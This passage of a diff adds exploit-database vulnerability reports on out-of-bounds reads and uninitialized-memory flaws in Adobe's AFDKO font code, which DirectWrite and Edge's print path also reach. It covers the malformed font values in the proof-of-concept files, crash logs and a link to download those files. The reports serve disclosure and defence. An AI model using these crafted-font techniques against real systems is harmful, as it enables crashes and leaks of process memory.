+While fuzzing the standard "tx" AFDKO utility using a "tx -cff <input file> /dev/null" command, we have encountered multiple crashes in the CFF Writer (cfw) component of the FDK. These crashes are triggered in the cfwSindexGetString() function in the afdko/c/public/lib/source/cffwrite/cffwrite_sindex.c file:
+
+--- cut ---
+   148  /* Get string from SRI. */
+   149  char *cfwSindexGetString(cfwCtx g, SRI index) {
+   150      sindexCtx h = g->ctx.sindex;
+   151      if (index < STD_STR_CNT) {
+   152          return sid2std[index];
+   153      } else {
+   154          return &h->strings.array[h->custom.array[index - STD_STR_CNT].iString];
+   155      }
+   156  }
+--- cut ---
+
+In all cases, the exception is thrown in line 154, and is caused by an out-of-bounds access to h->custom.array[] due to the "index" argument being equal to 65535 (0xffff). For some reproducers, the h->custom dynamic array is correctly initialized and h->custom.array points into a heap allocation; in other cases h->custom is an empty array and h->custom.array has a near-NULL value. Even in the latter case, accessing h->custom.array[65144] translates to an address around 0x7f4c4 (on x86) or 0xfe884 (on x64), both of which can be mapped on many operating systems.
+
+The cfwSindexGetString() function is called from fillNameINDEX() in cffwrite/cffwrite.c:
+
+--- cut ---
+   845      for (i = 0; i < h->FontSet.cnt; i++) {
+   846          cff_Font *font = &h->FontSet.array[i];
+   847          if (font->FDArray.cnt > 0) {
+   848              char *name =
+   849                  cfwSindexGetString(h->g, (SRI)((font->flags & FONT_CID) ? font->top.cid.CIDFontName.impl : font->FDArray.array[0].dict.FontName.impl));
+   850              /* 64-bit warning fixed by cast here */
+   851              h->name.datasize += (long)strlen(name);
+   852          }
+   853      }
+--- cut ---
+
+We can see that the "index" argument is passed from font->top.cid.CIDFontName.impl or font->FDArray.array[0].dict.FontName.impl. Both CIDFontName and FontName objects are abfString structures, defined in afdko/c/public/lib/api/absfont.h:
+
+--- cut ---
+    44  typedef struct /* String */
+    45  {
+    46      char *ptr; /* ABF_UNSET_PTR */
+    47      long impl; /* ABF_UNSET_INT */
+    48  } abfString;
+--- cut ---
+
+The "impl" field is used to store a SRI-typed value, which takes the default value of SRI_UNDEF if it is uninitialized or invalid:
+
+--- cut ---
+    22  #define SRI_UNDEF 0xffff    /* SRI of undefined string */
+--- cut ---
+
+This indicates that the font name-related structures are not properly initialized before being used to generate the output CFF font. As the string returned by cfwSindexGetString() is later saved to the output file, this out-of-bounds read could lead to the disclosure of the AFDKO client process memory.
+
+-----=====[ Proof of Concept ]=====-----
+
+There are two proof of concept files, poc1.otf and poc2.otf. The first one triggers an access to h->custom.array[65144] for an empty h->custom array, while the second one results in a similar OOB read but with a non-empty h->custom object.
+
+The fonts are specially crafted to parse correctly with DirectWrite but trigger the bug in AFDKO. The original CFF2 table was left untouched, and a second copy of it with the modified DICT was inserted at the end of the fonts with the tag "CFF ". This way, DirectWrite successfully loads the legitimate variable font, and AFDKO processes the modified version as the CFF table takes precedence over CFF2 due to the logic implemented in srcOpen() in afdko/c/public/lib/source/cffread/cffread.c.
+
+-----=====[ Crash logs ]=====-----
+
+A 64-bit build of "tx" compiled with AddressSanitizer, started with ./tx -cff poc2.otf prints out the following report:
+
+--- cut ---
+=================================================================
+==253002==ERROR: AddressSanitizer: SEGV on unknown address 0x6210000ffc80 (pc 0x00000058aa1a bp 0x7fffd5742e70 sp 0x7fffd5742e00 T0)
+==253002==The signal is caused by a READ memory access.
+    #0 0x58aa19 in cfwSindexGetString afdko/c/public/lib/source/cffwrite/cffwrite_sindex.c:154:17
+    #1 0x56fe6c in fillNameINDEX afdko/c/public/lib/source/cffwrite/cffwrite.c:849:17
+    #2 0x56d37f in initSetSizes afdko/c/public/lib/source/cffwrite/cffwrite.c:896:24
+    #3 0x567320 in fillSet afdko/c/public/lib/source/cffwrite/cffwrite.c:1085:5
+    #4 0x5645b5 in cfwEndSet afdko/c/public/lib/source/cffwrite/cffwrite.c:2128:5
+    #5 0x6ebd6d in cff_EndSet afdko/c/public/lib/source/tx_shared/tx_shared.c:1076:9
+    #6 0x506b6c in doSingleFileSet afdko/c/tx/source/tx.c:489:5
+    #7 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #8 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #9 0x7f19da4782b0 in __libc_start_main
+    #10 0x41e5b9 in _start
+
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV afdko/c/public/lib/source/cffwrite/cffwrite_sindex.c:154:17 in cfwSindexGetString
+==253002==ABORTING
+--- cut ---
+
+A non-instrumented version of "tx" crashes with a SIGSEGV when it reaches an unmapped memory area:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x0000000000424a4c in cfwSindexGetString (g=0x6fd890, index=65535) at ../../../../../source/cffwrite/cffwrite_sindex.c:154
+154             return &h->strings.array[h->custom.array[index - STD_STR_CNT].iString];
+
+(gdb) print index
+$1 = 65535
+(gdb) print h->custom
+$2 = {ctx = 0x6fdb90, array = 0x72a580, cnt = 1, size = 260, incr = 1000, func = 0x0}
+
+(gdb) x/10i $rip
+=> 0x424a4c <cfwSindexGetString+108>:   add    (%rcx),%rax
+   0x424a4f <cfwSindexGetString+111>:   mov    %rax,-0x8(%rbp)
+   0x424a53 <cfwSindexGetString+115>:   mov    -0x8(%rbp),%rax
+   0x424a57 <cfwSindexGetString+119>:   pop    %rbp
+   0x424a58 <cfwSindexGetString+120>:   retq
+   0x424a59:    nopl   0x0(%rax)
+   0x424a60 <cfwSindexAssignSID>:       push   %rbp
+   0x424a61 <cfwSindexAssignSID+1>:     mov    %rsp,%rbp
+   0x424a64 <cfwSindexAssignSID+4>:     mov    %si,%ax
+   0x424a67 <cfwSindexAssignSID+7>:     mov    %rdi,-0x10(%rbp)
+(gdb) info reg $rcx
+rcx            0x828d00 8555776
+(gdb) x/10gx $rcx
+0x828d00:       Cannot access memory at address 0x828d00
+
+(gdb) bt
+#0  0x0000000000424a4c in cfwSindexGetString (g=0x6fd890, index=65535) at ../../../../../source/cffwrite/cffwrite_sindex.c:154
+#1  0x000000000041de69 in fillNameINDEX (h=0x6fdbd0) at ../../../../../source/cffwrite/cffwrite.c:849
+#2  0x000000000041d3f0 in initSetSizes (h=0x6fdbd0) at ../../../../../source/cffwrite/cffwrite.c:896
+#3  0x000000000041b8be in fillSet (h=0x6fdbd0) at ../../../../../source/cffwrite/cffwrite.c:1085
+#4  0x000000000041ae7c in cfwEndSet (g=0x6fd890) at ../../../../../source/cffwrite/cffwrite.c:2128
+#5  0x000000000047a79c in cff_EndSet (h=0x6f6010) at ../../../../../source/tx_shared/tx_shared.c:1076
+#6  0x000000000040533f in doSingleFileSet (h=0x6f6010, srcname=0x7fffffffdf1a "poc2.otf")
+    at ../../../../source/tx.c:489
+#7  0x0000000000402f59 in parseArgs (h=0x6f6010, argc=2, argv=0x7fffffffdc20) at ../../../../source/tx.c:558
+#8  0x0000000000401df2 in main (argc=2, argv=0x7fffffffdc20) at ../../../../source/tx.c:1631
+(gdb)
+--- cut ---
+
+A similar Microsoft Edge renderer process crash (but in a slightly different code path) is also shown below:
+
+--- cut ---
+(61c8.53dc): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!cfwSindexGetString+0x27:
+00007ffb`29e7a51b 486384c8c8f3ffff movsxd  rax,dword ptr [rax+rcx*8-0C38h] ds:000001eb`f4260d20=????????
+0:039> ? rax
+Evaluate expression: 2112924555616 = 000001eb`f41e1960
+0:039> ? rcx
+Evaluate expression: 65535 = 00000000`0000ffff
+0:039> db rax+rcx*8-c38
+000001eb`f4260d20  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001eb`f4260d30  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001eb`f4260d40  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001eb`f4260d50  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001eb`f4260d60  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001eb`f4260d70  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001eb`f4260d80  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+000001eb`f4260d90  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
+0:039> k
+ # Child-SP          RetAddr           Call Site
+00 00000062`d53eb1d8 00007ffb`29e700d3 DWrite!cfwSindexGetString+0x27
+01 00000062`d53eb1e0 00007ffb`29e707d9 DWrite!fillNameINDEX+0x4b
+02 00000062`d53eb210 00007ffb`29e702cf DWrite!initSetSizes+0x49
+03 00000062`d53eb240 00007ffb`29e7219d DWrite!fillSet+0x163
+04 00000062`d53eb2b0 00007ffb`29e62314 DWrite!cfwEndSet+0x51
+05 00000062`d53eb2f0 00007ffb`29df157a DWrite!AdobeCFF2Snapshot+0x23c
+06 00000062`d53eb7f0 00007ffb`29df0729 DWrite!FontInstancer::InstanceCffTable+0x212
+07 00000062`d53eb9d0 00007ffb`29df039a DWrite!FontInstancer::CreateInstanceInternal+0x249
+08 00000062`d53ebbf0 00007ffb`29dd5a4e DWrite!FontInstancer::CreateInstance+0x192
+09 00000062`d53ebf50 00007ffb`34eb61ab DWrite!DWriteFontFace::CreateInstancedStream+0x9e
+0a 00000062`d53ebfe0 00007ffb`34ea9148 d2d1!dxc::TextConvertor::InstanceFontResources+0x19f
+0b 00000062`d53ec100 00007ffb`0f8b50f4 d2d1!dxc::CXpsPrintControl::Close+0xc8
+0c 00000062`d53ec150 00007ffb`0f88fcb0 edgehtml!CDXPrintControl::Close+0x44
+0d 00000062`d53ec1a0 00007ffb`0f8947ad edgehtml!CTemplatePrinter::EndPrintD2D+0x5c
+0e 00000062`d53ec1d0 00007ffb`0f76b515 edgehtml!CPrintManagerTemplatePrinter::endPrint+0x2d
+0f 00000062`d53ec200 00007ffb`0f3c9175 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Trampoline_endPrint+0x45
+10 00000062`d53ec240 00007ffa`f02e68f1 edgehtml!CFastDOM::CMSPrintManagerTemplatePrinter::Profiler_endPrint+0x25
+[...]
+--- cut ---
+
+-----=====[ References ]=====-----
+
+[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
+[2] https://github.com/adobe-type-tools/afdko
+[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
+[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47100.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47101.txt b/exploits/windows/dos/47101.txt
new file mode 100644
index 000000000..a40685b75
--- /dev/null
+++ b/exploits/windows/dos/47101.txt
@@ -0,0 +1,376 @@
+-----=====[ Background ]=====-----
+
+AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
+
+At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
+
+We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
+
+One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input. Below is a description of one such security vulnerability in Adobe's library exploitable through the Edge web browser.
+
+-----=====[ Description ]=====-----
+
+The readCharset() function in afdko/c/public/lib/source/cffread/cffread.c is called from cfrBegFont(), the main entry point for parsing an input OpenType/CFF font by the "cfr" (CFF Reader) component of AFDKO. At the beginning of the function, it handles variable CFF2 fonts:
+
+--- cut ---
+  2138      if (h->header.major == 2) {
+  2139          postRead(h);
+  2140          if (h->cff2.mvar)
+  2141              MVARread(h);
+  2142          if (!(h->flags & CID_FONT))
+  2143              readCharSetFromPost(h);
+  2144          else {
+  2145              long gid;
+  2146              for (gid = 0; gid < h->glyphs.cnt; gid++) {
+  2147                  abfGlyphInfo *info = &h->glyphs.array[gid];
+  2148                  info->cid = (unsigned short)gid;
+  2149              }
+  2150          }
+  2151          return;
+  2152      }
+--- cut ---
+
+In this report, we are most interested in lines 2139 and 2143, i.e. the calls to postRead() and readCharSetFromPost(). The postRead() routine is responsible for processing the "post" optional SFNT table, extracting the glyph names that it contains and copying them into the internal engine structures. Let's analyze some of its most important parts:
+
+--- cut ---
+  1960      if (h->flags & CID_FONT)
+  1961          return; /* Don't read glyph names for CID fonts */
+  1962
+  1963      if (h->post.format != 0x00020000) {
+  1964          buildGIDNames(h);
+  1965          return;
+  1966      }
+--- cut ---
+
+In order to pass the two checks, the font must not be CID-keyed and the "post" table format must be 2.0. Then, the number of glyphs described by the table is loaded, and if it's inconsistent with the font's number of glyphs, a warning message is printed. 
+
+--- cut ---
+  1975      /* Parse format 2.0 data */
+  1976      numGlyphs = read2(h);
+  1977      if (numGlyphs != h->glyphs.cnt)
+  1978          message(h, "post 2.0: name index size doesn't match numGlyphs");
+--- cut ---
+
+Then, the function proceeds to fill out three internal objects: h->post.fmt2.glyphNameIndex (a dynamic array of "unsigned short", containing indexes into "strings"), h->post.fmt2.strings (a dynamic array of string pointers) and h->post.fmt2.buf (a dynamic array of characters, storing the textual data pointed to by "strings"). One very peculiar feature of the function is that upon encountering invalid input data, it flips the "post" table format to 0x00000001 (even though it was originally 0x00020000) and returns with success:
+
+--- cut ---
+  2026  parseError:
+  2027      /* We managed to read the header but the rest of the table had an error that
+  2028       prevented reading some (or all) glyph names. We set the the post format
+  2029       to a value that will allow us to use the header values but will prevent
+  2030       us from using any glyph name data which is likely missing or invalid */
+  2031      h->post.format = 0x00000001;
+  2032  }
+--- cut ---
+
+While the message explains the developer's intention quite well, it is not factually correct, as the above post format doesn't prevent the code from using glyph name data later on. 
+
+The "parseError" label can be reached from four different locations, each of them being the result of a failed sanity check:
+
+--- cut ---
+  1968      if (invalidStreamOffset(h, table->offset + table->length - 1)) {
+  1969          message(h, "post: table truncated");
+  1970          goto parseError;
+  1971      }
+[...]
+  1982      if (length < numGlyphs * 2) {
+  1983          message(h, "post 2.0: table truncated (table ignored)");
+  1984          goto parseError;
+  1985      }
+[...]
+  1993          if (nid > 32767) {
+  1994              message(h, "post 2.0: invalid name id (table ignored)");
+  1995              goto parseError;
+[...]
+  2015          if (p > end) {
+  2016              message(h, "post 2.0: invalid strings");
+  2017              goto parseError;
+  2018          }
+--- cut ---
+
+Executing the goto statements in lines 1995 and 2017 may lead to inconsistent program state. Here is what may happen:
+
+- When line 1995 executes, the "glyphNameIndex" object has "numGlyphs" elements, but some of them may be uninitialized, and the "strings" and "buf" arrays are empty.
+- When line 2017 executes, the "strings" array may be shorter than "glyphNameIndex" (because "strCount" may be smaller than "numGlyphs", as counted by the array in lines 1990-1998), and it may be only partially initialized.
+
+Knowing that the above conditions may be achieved, let's analyze the second function of interest, readCharSetFromPost(). A majority of its body only executes if the CFR_IS_CFF2 flag is not set, which is not the case for us (remember that the input font must be a CFF2 one):
+
+--- cut ---
+  2060  static void readCharSetFromPost(cfrCtx h) {
+  2061      Offset offset;
+  2062      unsigned long i;
+  2063      long gid;
+  2064      char *p;
+  2065      long lenStrings = ARRAY_LEN(stdstrs);
+  2066
+  2067      if (!(h->flags & CFR_IS_CFF2)) {
+[...]
+  2111      }
+[...]
+--- cut ---
+
+This leaves us with the following loop at the end:
+
+--- cut ---
+  2113      for (gid = 0; gid < h->glyphs.cnt; gid++) {
+  2114          abfGlyphInfo *info = &h->glyphs.array[gid];
+  2115          info->gname.ptr = post2GetName(h, (SID)gid);
+  2116      }
+--- cut ---
+
+For each glyph in the font, the loop tries to initialize the glyph's gname.ptr pointer with the address of its textual name. To obtain the address, the following post2GetName() function is used:
+
+--- cut ---
+  1819  /* Get glyph name from format 2.0 post table. */
+  1820  static char *post2GetName(cfrCtx h, SID gid) {
+  1821      if (gid >= h->post.fmt2.glyphNameIndex.cnt)
+  1822          return NULL; /* Out of bounds; .notdef */
+  1823      else if (h->post.format != 0x00020000)
+  1824          return h->post.fmt2.strings.array[gid];
+  1825      else {
+  1826          long nid = h->post.fmt2.glyphNameIndex.array[gid];
+  1827          if (nid == 0)
+  1828              return stdstrs[nid]; /* .notdef */
+  1829          else if (nid < 258)
+  1830              return applestd[nid];
+  1831          else if (nid - 258 >= h->post.fmt2.strings.cnt) {
+  1832              return NULL; /* Out of bounds; .notdef */
+  1833          } else
+  1834              return h->post.fmt2.strings.array[nid - 258];
+  1835      }
+  1836  }
+--- cut ---
+
+This is the last piece of the puzzle and the place where most of the problem resides. Between lines 1821-1824, the code makes two significant assumptions:
+
+- That the h->post.fmt2.strings array is as long as h->post.fmt2.glyphNameIndex, i.e. if "gid < h->post.fmt2.glyphNameIndex.cnt" then it is safe to access h->post.fmt2.strings.array[gid].
+- That the h->post.fmt2.strings array is fully initialized.
+
+Now as we saw before, neither of these assumptions must be true: the "strings" array may be shorter (or completely empty) than "glyphNameIndex", and it may be partially uninitialized due to an early exit from postRead(). Breaking the assumptions may lead to the following:
+
+- A NULL pointer dereference in line 1824, since an empty "strings" object has a near-NULL "array" value,
+- Returning an uninitialized chunk of memory as the address of the glyph name,
+- Returning an out-of-bounds chunk of memory as the address of the glyph name.
+
+In the 2nd and 3rd case, the invalid gname.ptr value is later referenced when building the output file, for example in glyphBeg (cffwrite/cffwrite_t2cstr.c) if the output format is CFF:
+
+--- cut ---
+   243                 (info->gname.ptr == NULL || info->gname.ptr[0] == '\0')) {
+--- cut ---
+
+Considering that the vulnerability may allow writing a string from a potentially controlled address in the process address space to the output file, we classify it as an information disclosure flaw.
+
+-----=====[ Lesser bugs ]=====-----
+
+There are two less significant bugs in the creation of the C strings array in postRead(). Let's analyze the following loop again:
+
+--- cut ---
+  2005      /* Build C strings array */
+  2006      dnaSET_CNT(h->post.fmt2.strings, strCount);
+  2007      p = h->post.fmt2.buf.array;
+  2008      end = p + length;
+  2009      i = 0;
+  2010      for (i = 0; i < h->post.fmt2.strings.cnt; i++) {
+  2011          length = *(unsigned char *)p;
+  2012          *p++ = '\0';
+  2013          h->post.fmt2.strings.array[i] = p;
+  2014          p += length;
+  2015          if (p > end) {
+  2016              message(h, "post 2.0: invalid strings");
+  2017              goto parseError;
+  2018          }
+  2019      }
+  2020      *p = '\0';
+  2021      if (p != end)
+  2022          message(h, "post 2.0: string data didn't reach end of table");
+  2023
+  2024      return; /* Success */
+  2025
+  2026  parseError:
+  2027      /* We managed to read the header but the rest of the table had an error that
+  2028       prevented reading some (or all) glyph names. We set the the post format
+  2029       to a value that will allow us to use the header values but will prevent
+  2030       us from using any glyph name data which is likely missing or invalid */
+  2031      h->post.format = 0x00000001;
+  2032  }
+--- cut ---
+
+The issues are as follows:
+
+- It is possible to set a glyph name in h->post.fmt2.strings.array[i] (line 2013) to a pointer just outside the h->post.fmt2.buf.array allocation (i.e. equal to the value of the "end" pointer). This is due to the fact that the check in line 2015 only verifies that "p" doesn't go significantly outside the buffer, but allows it to be exactly on the verge of it (one byte after). This may later lead to the disclosure of out-of-bounds heap memory.
+- If the error branch in lines 2015-2018 is taken, the last initialized string in the h->post.fmt2.strings array won't be nul-terminated, which also may disclose data from adjacent heap chunks.
+
+-----=====[ Proof of Concept ]=====-----
+
+There are three proof of concept files, poc_null_deref.otf, poc_uninit.otf and poc_oob.otf. They trigger crashes as a result of a NULL pointer dereference, use of uninitialized memory and an out-of-bounds memory read, respectively.
+
+The malformed values are as follows:
+
+- In poc_null_deref.otf, the first "nid" is 65535 (larger than 32767), causing the goto statement in line 1995 to be executed, which leaves h->post.fmt2.strings empty.
+- In poc_uninit.otf, the length of the first string on the list is declared as 255, which exceeds the length of the overall "post" table. This causes postRead() to bail out early in cffread.c:2017, with only h->post.fmt2.strings.array[0] having been initialized, but not array[1] or array[2]. However the latter two values are still returned as valid glyph names by post2GetName(). Later on, this leads to a crash while trying to read from address 0xbebe..be, with 0xbe being ASAN's uninitialized memory marker.
+- In poc_oob.otf, we set numGlyphs to 60 (i.e. the length of the h->post.fmt2.glyphNameIndex) array, but set the "nid" values such that strCount (i.e. the length of h->post.fmt2.strings) equals 50. All 50 string lengths are set to 0 except for the last one, which is set to 255, exceeding the size of the "post" table. This causes the "goto" in line 2017 to be taken, setting the post table format to 0x00000001. At a later stage of the font parsing, post2GetName() is called with gid=0, 1, ... 49, 50, 51, 52, and so forth. When "gid" reaches 50, the "gid >= h->post.fmt2.glyphNameIndex.cnt" condition is not met and "h->post.format != 0x00020000" is, so the function ends up accessing the out-of-bounds value at h->post.fmt2.strings.array[50].
+
+The uninitialized memory case doesn't affect Microsoft DirectWrite, as its own allocation function returns zero-ed out memory.
+
+-----=====[ Crash logs ]=====-----
+
+A 64-bit build of "tx" compiled with AddressSanitizer, started with ./tx -cff poc_uninit.otf crashes in the following way:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x00000000005b5add in glyphBeg (cb=0x62c0000078d8, info=0x7ffff7e2a850) at ../../../../../source/cffwrite/cffwrite_t2cstr.c:243
+243                    (info->gname.ptr == NULL || info->gname.ptr[0] == '\0')) {
+(gdb) x/10i $rip
+=> 0x5b5add <glyphBeg+2125>:    mov    0x7fff8000(%rdx),%sil
+   0x5b5ae4 <glyphBeg+2132>:    cmp    $0x0,%sil
+   0x5b5ae8 <glyphBeg+2136>:    mov    %rcx,-0x138(%rbp)
+   0x5b5aef <glyphBeg+2143>:    mov    %sil,-0x139(%rbp)
+   0x5b5af6 <glyphBeg+2150>:    je     0x5b5b23 <glyphBeg+2195>
+   0x5b5afc <glyphBeg+2156>:    mov    -0x138(%rbp),%rax
+   0x5b5b03 <glyphBeg+2163>:    and    $0x7,%rax
+   0x5b5b07 <glyphBeg+2167>:    mov    %al,%cl
+   0x5b5b09 <glyphBeg+2169>:    mov    -0x139(%rbp),%dl
+   0x5b5b0f <glyphBeg+2175>:    cmp    %dl,%cl
+   
+(gdb) info reg $rdx
+rdx            0x17d7d7d7d7d7d7d7       1718079104904320983
+(gdb) print info->gname
+$1 = {ptr = 0xbebebebebebebebe <error: Cannot access memory at address 0xbebebebebebebebe>, impl = -1}
+
+(gdb) bt
+#0  0x00000000005b5add in glyphBeg (cb=0x62c0000078d8, info=0x7ffff7e2a850) at ../../../../../source/cffwrite/cffwrite_t2cstr.c:243
+#1  0x00000000006d6fd2 in otfGlyphBeg (cb=0x62c0000078d8, info=0x7ffff7e2a850) at ../../../../../source/tx_shared/tx_shared.c:4812
+#2  0x0000000000542089 in readGlyph (h=0x62a000000200, gid=1, glyph_cb=0x62c0000078d8) at ../../../../../source/cffread/cffread.c:2891
+#3  0x0000000000541c33 in cfrIterateGlyphs (h=0x62a000000200, glyph_cb=0x62c0000078d8) at ../../../../../source/cffread/cffread.c:2966
+#4  0x0000000000509663 in cfrReadFont (h=0x62c000000200, origin=0, ttcIndex=0) at ../../../../source/tx.c:151
+#5  0x0000000000508cc4 in doFile (h=0x62c000000200, srcname=0x7fffffffdf37 "poc_uninit.otf")
+    at ../../../../source/tx.c:429
+#6  0x0000000000506b2f in doSingleFileSet (h=0x62c000000200, srcname=0x7fffffffdf37 "poc_uninit.otf")
+    at ../../../../source/tx.c:488
+#7  0x00000000004fc91f in parseArgs (h=0x62c000000200, argc=2, argv=0x7fffffffdc30) at ../../../../source/tx.c:558
+#8  0x00000000004f9471 in main (argc=2, argv=0x7fffffffdc30) at ../../../../source/tx.c:1631
+(gdb)
+--- cut ---
+
+A 64-bit build of "tx" compiled with AddressSanitizer, started with ./tx -cff poc_oob.otf prints out the following report:
+
+--- cut ---
+=================================================================
+==172440==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6140000005d0 at pc 0x000000556c71 bp 0x7fffcbccca60 sp 0x7fffcbccca58
+READ of size 8 at 0x6140000005d0 thread T0
+    #0 0x556c70 in post2GetName afdko/c/public/lib/source/cffread/cffread.c:1824:16
+    #1 0x555f53 in readCharSetFromPost afdko/c/public/lib/source/cffread/cffread.c:2115:27
+    #2 0x53efc4 in readCharset afdko/c/public/lib/source/cffread/cffread.c:2143:13
+    #3 0x5299c7 in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2789:9
+    #4 0x50928d in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #5 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #6 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #7 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #8 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #9 0x7f655ae8e2b0 in __libc_start_main
+    #10 0x41e5b9 in _start
+
+0x6140000005d0 is located 0 bytes to the right of 400-byte region [0x614000000440,0x6140000005d0)
+allocated by thread T0 here:
+    #0 0x4c63f3 in __interceptor_malloc
+    #1 0x6c9da2 in mem_manage afdko/c/public/lib/source/tx_shared/tx_shared.c:73:20
+    #2 0x5474a4 in dna_manage afdko/c/public/lib/source/cffread/cffread.c:271:17
+    #3 0x7de92e in dnaGrow afdko/c/public/lib/source/dynarr/dynarr.c:86:23
+    #4 0x7def55 in dnaSetCnt afdko/c/public/lib/source/dynarr/dynarr.c:119:13
+    #5 0x554658 in postRead afdko/c/public/lib/source/cffread/cffread.c:2006:5
+    #6 0x53eed9 in readCharset afdko/c/public/lib/source/cffread/cffread.c:2139:9
+    #7 0x5299c7 in cfrBegFont afdko/c/public/lib/source/cffread/cffread.c:2789:9
+    #8 0x50928d in cfrReadFont afdko/c/tx/source/tx.c:137:9
+    #9 0x508cc3 in doFile afdko/c/tx/source/tx.c:429:17
+    #10 0x506b2e in doSingleFileSet afdko/c/tx/source/tx.c:488:5
+    #11 0x4fc91e in parseArgs afdko/c/tx/source/tx.c:558:17
+    #12 0x4f9470 in main afdko/c/tx/source/tx.c:1631:9
+    #13 0x7f655ae8e2b0 in __libc_start_main
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow afdko/c/public/lib/source/cffread/cffread.c:1824:16 in post2GetName
+Shadow bytes around the buggy address:
+  0x0c287fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c287fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa
+  0x0c287fff8080: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x0c287fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c287fff80a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c287fff80b0: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa
+  0x0c287fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c287fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c287fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c287fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c287fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==172440==ABORTING
+--- cut ---
+
+A similar Microsoft Edge renderer process crash is also shown below (with Application Verifier enabled for MicrosoftEdgeCP.exe):
+
+--- cut ---
+(221c.1250): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!post2GetName+0x25:
+00007ffd`100f5475 488b04c8        mov     rax,qword ptr [rax+rcx*8] ds:00000247`2b29b000=????????????????
+0:039> ? rax
+Evaluate expression: 2504690085488 = 00000247`2b29ae70
+0:039> ? rcx
+Evaluate expression: 50 = 00000000`00000032
+0:039> dq rax
+00000247`2b29ae70  00000247`2b296ed1 00000247`2b296ed2
+00000247`2b29ae80  00000247`2b296ed3 00000247`2b296ed4
+00000247`2b29ae90  00000247`2b296ed5 00000247`2b296ed6
